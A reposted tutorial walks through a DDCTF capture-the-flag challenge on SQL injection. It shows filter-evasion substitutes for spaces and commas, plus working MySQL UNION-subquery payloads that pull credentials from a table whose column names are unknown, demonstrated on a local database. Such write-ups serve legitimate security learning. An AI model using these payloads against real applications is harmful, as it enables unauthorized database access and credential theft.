How to bypass unknown field names in MySQL

Preface

This article introduces the fifth question of DDCTF, the technique of bypassing unknown field names. Here I use the local machine to operate it. The idea is great and clear. Share it with everyone. Let's take a look at the detailed introduction:

Implementation ideas

The question filters spaces and commas. Spaces can be bypassed using %0a, %0b, %0c, %0d, %a0, or parentheses directly. Commas can be bypassed using join.

The field name storing the flag is unknown, and information_schema.columns also filters the hex of the table name, that is, the field name cannot be obtained; in this case, a joint query can be used, and the process is as follows:

The idea is to get the flag and make it appear under a known field name;

Sample code:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4 |
+-------------+
| 4 |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4 |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id | username | password | email |
+-------------+----------+----------+-------------+
| 1 | admin | admin888 | 110@110.com |
| 120@120.com | 1 | 1 | 1 |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

Summarize

The above is the full content of this article. I hope that the content of this article can bring some help to your study or work. If you have any questions, you can leave a message to communicate. Thank you for your support of 123WORDPRESS.COM.

You may also be interested in:

Prevent xss and sql injection: JS special character filtering regular
A SQL statement to filter duplicate data
Summary of MySQL injection bypass filtering techniques
SQL injection bypasses single quote restriction and continues injection
Summary of SQL injection bypass techniques
Using multi-column composite indexes to bypass a bug in Microsoft SQL Server
Some knowledge points about SQL injection bypass
Method for recovering accidentally deleted heap table records in SQL Server simple mode (bypassing header verification)
SQL injection techniques: Detailed analysis of bypassing comma filtering in explicit and blind injections

<<: Tomcat obtains the client domain name of Nginx reverse proxy

>>: How to reduce image size using Docker multi-stage build

Detailed analysis of the parameter file my.cnf of MySQL in Ubuntu

JS Difficulties Synchronous and Asynchronous and Scope and Closure and Detailed Explanation of Prototype and Prototype Chain

Table of contents JS Three Mountains Synchronous ...

How to bypass unknown field names in MySQL

Detailed analysis of the parameter file my.cnf of MySQL in Ubuntu

How to allow remote access to open ports in Linux

A brief discussion on the color matching skills of web pages (a must-read for front-end developers)

WeChat applet realizes simple tab switching effect

Install OpenSSH on Windows and log in to the Linux server by generating an SSH key

Detailed steps to store emoji expressions in MySQL

Detailed explanation of the execution process of JavaScript engine V8

Detailed explanation of the misunderstanding between MySQL and Oracle

The difference between MySQL user management and PostgreSQL user management

Example code for implementing the secondary linkage effect of the drop-down box in Vue

Recommend

How to configure mysql on ubuntu server and implement remote connection

10 tips for designing useful, easy-to-use web applications

Detailed explanation of the use of DockerHub image repository

Analysis of the principle of using PDO to prevent SQL injection

What are the benefits of using // instead of http:// (adaptive https)

Detailed explanation of the solution to keep the content within the container in flex layout

Solution to "No such file or directory" in locale after installing glibc-2.14 in CentOS6.5

A few front-end practice summaries of Alipay's new homepage

In-depth reading and practice records of conditional types in TypeScript

Detailed explanation of Nginx Rewrite usage scenarios and code examples

Detailed explanation of the installation steps of the MySQL decompressed version

Detailed explanation of how to run jmeter under Linux system and optimize local memory

CSS Sticky Footer Implementation Code

The most commonly used HTML tags to create web pages

JS Difficulties Synchronous and Asynchronous and Scope and Closure and Detailed Explanation of Prototype and Prototype Chain